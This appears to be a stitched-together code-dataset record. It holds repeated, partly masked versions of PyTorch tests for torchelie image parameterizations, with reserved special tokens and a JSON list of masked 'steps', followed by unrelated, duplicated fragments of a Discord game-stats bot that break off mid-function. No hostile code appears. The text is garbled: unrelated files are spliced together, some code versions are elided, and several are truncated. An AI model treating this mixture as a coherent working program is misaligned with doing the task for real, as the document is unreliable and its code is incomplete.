start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img
=start)()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-07)
def test_spectral_image():
pi = SpectralImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(1, 3, 128, 128)
pi = SpectralImage((1, 3, 128, 128), init_img=start)
<|reserved_special_token_0|>
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',
init_img=start)()
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img
=start)()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-07)
def test_spectral_image():
pi = SpectralImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(1, 3, 128, 128)
pi = SpectralImage((1, 3, 128, 128), init_img=start)
def test_correlate_colors():
corr = CorrelateColors()
start = torch.randn(1, 3, 64, 64)
assert start.allclose(corr.invert(corr(start)), atol=1e-05)
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',
init_img=start)()
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img
=start)()
<|reserved_special_token_1|>
import torch
from torchelie.data_learning import *
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-07)
def test_spectral_image():
pi = SpectralImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(1, 3, 128, 128)
pi = SpectralImage((1, 3, 128, 128), init_img=start)
def test_correlate_colors():
corr = CorrelateColors()
start = torch.randn(1, 3, 64, 64)
assert start.allclose(corr.invert(corr(start)), atol=1e-05)
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',
init_img=start)()
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img
=start)()
<|reserved_special_token_1|>
import torch
from torchelie.data_learning import *
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-7)
def test_spectral_image():
pi = SpectralImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(1, 3, 128, 128)
pi = SpectralImage((1, 3, 128, 128), init_img=start)
def test_correlate_colors():
corr = CorrelateColors()
start = torch.randn(1, 3, 64, 64)
assert start.allclose(corr.invert(corr(start)), atol=1e-5)
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3,
128,
128,
space='spectral',
colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3,
128,
129,
space='spectral',
colors='uncorr',
init_img=start)()
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3,
128,
128,
space='pixel',
colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3,
128,
128,
space='spectral',
colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr',
init_img=start)()
|
flexible
|
{
"blob_id": "73cacc1317c8624b45c017144bc7449bc99bd045",
"index": 9542,
"step-1": "<mask token>\n\n\ndef test_pixel_image():\n pi = PixelImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(3, 128, 128)\n pi = PixelImage((1, 3, 128, 128), init_img=start)\n assert start.allclose(pi() + 0.5, atol=1e-07)\n\n\n<mask token>\n\n\ndef test_parameterized_img():\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',\n init_img=start)()\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img\n =start)()\n",
"step-2": "<mask token>\n\n\ndef test_pixel_image():\n pi = PixelImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(3, 128, 128)\n pi = PixelImage((1, 3, 128, 128), init_img=start)\n assert start.allclose(pi() + 0.5, atol=1e-07)\n\n\ndef test_spectral_image():\n pi = SpectralImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(1, 3, 128, 128)\n pi = SpectralImage((1, 3, 128, 128), init_img=start)\n\n\n<mask token>\n\n\ndef test_parameterized_img():\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',\n init_img=start)()\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img\n =start)()\n",
"step-3": "<mask token>\n\n\ndef test_pixel_image():\n pi = PixelImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(3, 128, 128)\n pi = PixelImage((1, 3, 128, 128), init_img=start)\n assert start.allclose(pi() + 0.5, atol=1e-07)\n\n\ndef test_spectral_image():\n pi = SpectralImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(1, 3, 128, 128)\n pi = SpectralImage((1, 3, 128, 128), init_img=start)\n\n\ndef test_correlate_colors():\n corr = CorrelateColors()\n start = torch.randn(1, 3, 64, 64)\n assert start.allclose(corr.invert(corr(start)), atol=1e-05)\n\n\ndef test_parameterized_img():\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',\n init_img=start)()\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img\n =start)()\n",
"step-4": "import torch\nfrom torchelie.data_learning import *\n\n\ndef test_pixel_image():\n pi = PixelImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(3, 128, 128)\n pi = PixelImage((1, 3, 128, 128), init_img=start)\n assert start.allclose(pi() + 0.5, atol=1e-07)\n\n\ndef test_spectral_image():\n pi = SpectralImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(1, 3, 128, 128)\n pi = SpectralImage((1, 3, 128, 128), init_img=start)\n\n\ndef test_correlate_colors():\n corr = CorrelateColors()\n start = torch.randn(1, 3, 64, 64)\n assert start.allclose(corr.invert(corr(start)), atol=1e-05)\n\n\ndef test_parameterized_img():\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',\n init_img=start)()\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img\n =start)()\n",
"step-5": "import torch\nfrom torchelie.data_learning import *\n\n\ndef test_pixel_image():\n pi = PixelImage((1, 3, 128, 128), 0.01)\n pi()\n\n start = torch.randn(3, 128, 128)\n pi = PixelImage((1, 3, 128, 128), init_img=start)\n\n assert start.allclose(pi() + 0.5, atol=1e-7)\n\n\ndef test_spectral_image():\n pi = SpectralImage((1, 3, 128, 128), 0.01)\n pi()\n\n start = torch.randn(1, 3, 128, 128)\n pi = SpectralImage((1, 3, 128, 128), init_img=start)\n\n\ndef test_correlate_colors():\n corr = CorrelateColors()\n start = torch.randn(1, 3, 64, 64)\n assert start.allclose(corr.invert(corr(start)), atol=1e-5)\n\n\ndef test_parameterized_img():\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n ParameterizedImg(1, 3,\n 128,\n 128,\n space='spectral',\n colors='uncorr',\n init_img=start)()\n\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n\n start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3,\n 128,\n 129,\n space='spectral',\n colors='uncorr',\n init_img=start)()\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()\n ParameterizedImg(1, 3,\n 128,\n 128,\n space='pixel',\n colors='uncorr',\n init_img=start)()\n\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()\n ParameterizedImg(1, 3,\n 128,\n 128,\n space='spectral',\n colors='corr',\n init_img=start)()\n\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr',\n init_img=start)()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
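The tests above only construct and call the image parameterizations; in practice a ParameterizedImg is meant to be optimized. A minimal sketch, assuming only the constructor signature shown in the tests and that the class exposes parameters() like a torch module:

import torch
from torchelie.data_learning import ParameterizedImg

img = ParameterizedImg(1, 3, 64, 64, space='spectral', colors='uncorr')
opt = torch.optim.Adam(img.parameters(), lr=0.05)  # parameters() assumed (nn.Module style)

for _ in range(10):
    opt.zero_grad()
    loss = img().mean()  # stand-in objective; real uses plug in a feature/style loss
    loss.backward()
    opt.step()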
<|reserved_special_token_0|>
def roundMultiple(num, multiple):
if num % multiple:
return num + (multiple - num % multiple)
return num
<|reserved_special_token_0|>
def incrementStats(msgChannel, statsFile, winner, losers):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
if getIndex(winner, rows) < 0:
print('[ERROR] Winner "%s" not found in database' % winner)
return ERROR_PLAYER_NOT_FOUND % winner
for loser in losers:
loserIndex = getIndex(loser, rows)
if loser == winner:
print('[ERROR] Winner duplicated in losers field')
return ERROR_WIN_IN_LOSE % loser
if loserIndex < 0:
print('[ERROR] Loser "%s" not found in database' % loser)
return ERROR_PLAYER_NOT_FOUND % loser
dupList = findDuplicates(losers)
if len(dupList) > 0:
print('[ERROR] Duplicate losers found')
return ERROR_DUP_LOSER % dupList
winnerIndex = getIndex(winner, rows)
winnerVal = int(rows[winnerIndex][1])
rows[winnerIndex][1] = str(winnerVal + 1)
for loser in losers:
loserIndex = getIndex(loser, rows)
loserVal = int(rows[loserIndex][2])
rows[loserIndex][2] = str(loserVal + 1)
if writeDB(statsFile, data.headers, rows):
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
playerIndex = getIndex(player, rows)
if editType == 'ADD':
if playerIndex > -1:
print('[ERROR] "%s" already in database' % player)
print('[INFO] Database not updated')
return ERROR_IN_DB % player
else:
rows.append([player, wins, losses])
rows.sort(key=lambda name: name[0].capitalize())
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" added to database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'EDIT':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
rows[playerIndex] = [rows[playerIndex][0], wins, losses]
if writeDB(statsFile, data.headers, rows):
print("[INFO] %s's data changed" % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'REMOVE':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
del rows[playerIndex]
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" removed from database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
print('[INFO] Sort type is %s' % sortType)
returnMsg = ''
if sortType == 'WINRATE' or sortType == 'NONE':
try:
rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) +
float(rate[2])), reverse=True)
except ZeroDivisionError:
print(
'[ERROR] Tried to divide by zero because of blank player data')
returnMsg = ERROR_SORT_ERROR
elif sortType == 'WINS':
rows.sort(key=lambda wins: float(wins[1]), reverse=True)
elif sortType == 'LOSSES':
rows.sort(key=lambda losses: float(losses[2]), reverse=True)
elif sortType == 'NAME':
pass
else:
print(
'[ERROR] Invalid sorting type specified. Displaying stats as stored'
)
returnMsg = ERROR_INVALID_SORT
if player == 'ALL':
maxPlayerLen = 0
for player in rows:
if len(player[0]) > maxPlayerLen:
maxPlayerLen = len(player[0])
playerString = ''
startSpace = 4 if maxPlayerLen % 2 else 3
for player in rows:
playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace
)
winCount = player[1].rjust(7)
loseCount = player[2].rjust(9)
if float(winCount) <= 0:
winRate = '0'
elif float(loseCount) <= 0:
winRate = ' 100'
else:
winRate = str(float(winCount) / (float(winCount) + float(
loseCount)) * 100)
winRate = winRate[0:4].rjust(9)
playerString += (playerName + winCount + loseCount + winRate +
' %\n')
namePaddingLen = roundMultiple(maxPlayerLen + 2, 2)
header = ' |' + 'Name'.center(namePaddingLen
) + '| Wins | Losses | Win Rate |\n'
divider = '-' * len(header) + '\n'
sendString = '```md\n' + header + divider + playerString + '```'
if len(returnMsg) > 0:
returnMsg = returnMsg + sendString
return returnMsg
return sendString
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def roundMultiple(num, multiple):
if num % multiple:
return num + (multiple - num % multiple)
return num
def findDuplicates(inputList):
dupList = [k for k, v in Counter(inputList).items() if v > 1]
return dupList
def incrementStats(msgChannel, statsFile, winner, losers):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
if getIndex(winner, rows) < 0:
print('[ERROR] Winner "%s" not found in database' % winner)
return ERROR_PLAYER_NOT_FOUND % winner
for loser in losers:
loserIndex = getIndex(loser, rows)
if loser == winner:
print('[ERROR] Winner duplicated in losers field')
return ERROR_WIN_IN_LOSE % loser
if loserIndex < 0:
print('[ERROR] Loser "%s" not found in database' % loser)
return ERROR_PLAYER_NOT_FOUND % loser
dupList = findDuplicates(losers)
if len(dupList) > 0:
print('[ERROR] Duplicate losers found')
return ERROR_DUP_LOSER % dupList
winnerIndex = getIndex(winner, rows)
winnerVal = int(rows[winnerIndex][1])
rows[winnerIndex][1] = str(winnerVal + 1)
for loser in losers:
loserIndex = getIndex(loser, rows)
loserVal = int(rows[loserIndex][2])
rows[loserIndex][2] = str(loserVal + 1)
if writeDB(statsFile, data.headers, rows):
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
playerIndex = getIndex(player, rows)
if editType == 'ADD':
if playerIndex > -1:
print('[ERROR] "%s" already in database' % player)
print('[INFO] Database not updated')
return ERROR_IN_DB % player
else:
rows.append([player, wins, losses])
rows.sort(key=lambda name: name[0].capitalize())
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" added to database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'EDIT':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
rows[playerIndex] = [rows[playerIndex][0], wins, losses]
if writeDB(statsFile, data.headers, rows):
print("[INFO] %s's data changed" % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'REMOVE':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
del rows[playerIndex]
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" removed from database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
print('[INFO] Sort type is %s' % sortType)
returnMsg = ''
if sortType == 'WINRATE' or sortType == 'NONE':
try:
rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) +
import discord
from collections import Counter
from db import readDB, writeDB
INFO_DB_SUCCESS = 'Database updated successfully!'
ERROR_DB_ERROR = 'Error: Unable to open database for writing'
ERROR_DB_NOT_FOUND = 'Error: Database for specified game does not exist. Check your spelling or use !addgame first.'
ERROR_PLAYER_NOT_FOUND = 'Error: \"%s\" not found in database. Check your spelling or use !addplayer first.'
ERROR_WIN_IN_LOSE = 'Error: \"%s\" already specified as winner.'
ERROR_DUP_LOSER = 'Error: \"%s\" duplicated in losers list'
ERROR_IN_DB = 'Error: \"%s\" is already in the database'
ERROR_SORT_ERROR = 'Error while sorting list. Make sure all players have at least one win or loss.\n'
ERROR_INVALID_SORT = 'Error: Invalid sorting type. Displaying stats as stored.\n'
# desc: function to search a list of lists for a name
# args: name - the name to search the lists for
# searchList - a list of lists to search for a name
# retn: the index of the list containing the name or -1 if not found
def getIndex(name, searchList):
for i in range(0, len(searchList)):
if name in searchList[i]:
return i
return -1
# desc: function to round a number up to a specific increment. for example,
# rounding 11 to the nearest multiple of 2 would result in 12
# args: num - the number to round up
# multiple - the increment to round to
# retn: the rounded number
def roundMultiple(num, multiple):
if num % multiple:
return num + (multiple - (num % multiple))
return num
# desc: function to find duplicate items in a list
# args: inputList - a list to search for duplicates
# retn: a list containing the duplicates
def findDuplicates(inputList):
dupList = [k for k, v in Counter(inputList).items() if v > 1]
return dupList
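# e.g. findDuplicates(['kim', 'lee', 'kim']) returns ['kim'] (names are
# illustrative only; Counter preserves first-seen order on Python 3.7+)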
# desc: function to update the database
# args: msgChannel - the channel the invoking message was sent from
# statsFile - the name of the database file
# winner - a string containing the winner's name
# losers - a list of strings containing the losers' names
# retn: a string indicating success or failure
def incrementStats(msgChannel, statsFile, winner, losers):
# read the database
data = readDB(statsFile)
# return an error if database not found
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
# check if the winner is actually in the database
if getIndex(winner, rows) < 0:
print('[ERROR] Winner \"%s\" not found in database' % winner)
return (ERROR_PLAYER_NOT_FOUND % winner)
# check if losers are in database
for loser in losers:
# get loser index
loserIndex = getIndex(loser, rows)
# check against winner to see if the name was duplicated
if loser == winner:
print('[ERROR] Winner duplicated in losers field')
return (ERROR_WIN_IN_LOSE % loser)
# check if loser was not found in database
if loserIndex < 0:
print('[ERROR] Loser \"%s\" not found in database' % loser)
return (ERROR_PLAYER_NOT_FOUND % loser)
# check for duplicate losers
dupList = findDuplicates(losers)
if len(dupList) > 0:
print('[ERROR] Duplicate losers found')
return (ERROR_DUP_LOSER % dupList)
# update stats if we found the winner and all losers
# get index, get win count, increment and update
winnerIndex = getIndex(winner, rows)
winnerVal = int(rows[winnerIndex][1])
rows[winnerIndex][1] = str(winnerVal + 1)
# same as winner for each loser
for loser in losers:
loserIndex = getIndex(loser, rows)
loserVal = int(rows[loserIndex][2])
rows[loserIndex][2] = str(loserVal + 1)
# write the new data to the database file
if writeDB(statsFile, data.headers, rows):
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
# desc: function to add a player to the database or edit an existing player
# args: msgChannel - the channel the invoking message was sent from
# statsFile - the name of the database file
# player - the name of the player to either add to the db or edit
# editType - either 'ADD' or 'EDIT' or 'REMOVE' - sets type of change happening
# wins - the number of wins to assign the player
# losses - the number of losses to assign the player
# retn: a string indicating success or failure
def editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):
# open up the database
data = readDB(statsFile)
# return an error if database not found
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
playerIndex = getIndex(player, rows)
# check if player is already in database
if editType == 'ADD':
if playerIndex > -1:
print('[ERROR] \"%s\" already in database' % player)
print('[INFO] Database not updated')
return (ERROR_IN_DB % player)
else:
# add player to list and resort
rows.append([player, wins, losses])
rows.sort(key=lambda name: name[0].capitalize())
# write the new data to the database file
if writeDB(statsFile, data.headers, rows):
print('[INFO] \"%s\" added to database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'EDIT':
if playerIndex < 0:
print('[ERROR] \"%s\" not found in database' % player)
print('[INFO] Database not updated')
return (ERROR_PLAYER_NOT_FOUND % player)
else:
rows[playerIndex] = [rows[playerIndex][0], wins, losses]
# write the new data to the database file
if writeDB(statsFile, data.headers, rows):
print('[INFO] %s\'s data changed' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'REMOVE':
if playerIndex < 0:
print('[ERROR] \"%s\" not found in database' % player)
print('[INFO] Database not updated')
return (ERROR_PLAYER_NOT_FOUND % player)
else:
# delete player from list
            del rows[playerIndex]
# write the new data to the database
if writeDB(statsFile, data.headers, rows):
print('[INFO] \"%s\" removed from database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
# desc: function to display the stats
# args: msgChannel - the channel the invoking message was sent from
# statsFile - the name of the database file
# sortType - the order in which the results should be sorted.
# options are 'WINRATE', 'WINS', 'LOSSES', or 'NAME'.
# will revert to 'NAME' if invalid
# player - NOT IMPLEMENTED - the player to display stats for
# retn: a string formatted with the database stats
def dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):
# read database
data = readDB(statsFile)
# return an error if database not found
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
print('[INFO] Sort type is %s' % sortType)
returnMsg = ''
if sortType == 'WINRATE' or sortType == 'NONE':
# sort data by win rate
try:
rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) + float(rate[2])), reverse=True)
except ZeroDivisionError:
print('[ERROR] Tried to divide by zero because of blank player data')
returnMsg = ERROR_SORT_ERROR
elif sortType == 'WINS':
# sort by number of wins and reverse so max is first
rows.sort(key=lambda wins: float(wins[1]), reverse=True)
elif sortType == 'LOSSES':
# sort by number of losses and reverse so max is first
rows.sort(key=lambda losses: float(losses[2]), reverse=True)
elif sortType == 'NAME':
# database is stored sorted by name so dont do anything
pass
else:
print('[ERROR] Invalid sorting type specified. Displaying stats as stored')
returnMsg = ERROR_INVALID_SORT
    # per-player output is not implemented yet; initialise sendString so the
    # fall-through return below cannot raise a NameError
    sendString = ''
    if player == 'ALL':
# get max player length
maxPlayerLen = 0
for player in rows:
if len(player[0]) > maxPlayerLen:
maxPlayerLen = len(player[0])
# construct a string with all the player info
playerString = ''
# adjust start spacing if player length is odd or even to align with pipe
startSpace = 4 if maxPlayerLen % 2 else 3
for player in rows:
playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace)
winCount = player[1].rjust(7)
loseCount = player[2].rjust(9)
# calculate win rate
if float(winCount) <= 0:
winRate = '0'
